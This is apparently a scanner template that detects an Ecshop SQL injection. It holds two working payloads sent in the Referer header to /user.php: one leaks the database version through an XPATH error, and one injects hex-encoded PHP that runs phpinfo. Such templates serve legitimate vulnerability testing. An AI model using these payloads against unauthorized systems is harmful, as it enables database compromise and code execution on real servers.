id: ecshop-sqli info: name: Ecshop SQLi author: Lark-lab,ImNightmaree,ritikchaddha severity: high description: A vulnerability in Ecshop allows remote unauthenticated users to inject arbitrary SQL statements into via the 'Referer' header field. reference: - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html - http://www.wins21.com/mobile/blog/blog_view.html?num=1172 tags: sqli,php,ecshop requests: - raw: - | GET /user.php?act=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;} - | GET /user.php?act=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:110:"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -";s:2:"id";s:4:"'/*";}554fcae493e564ee0dc75bdf2ebf94ca matchers-condition: or matchers: - type: word words: - 'XPATH syntax error:' - '[error] =>' - '[0] => Array' - 'MySQL server error report:Array' condition: and - type: word words: - "PHP Extension" - "PHP Version" condition: and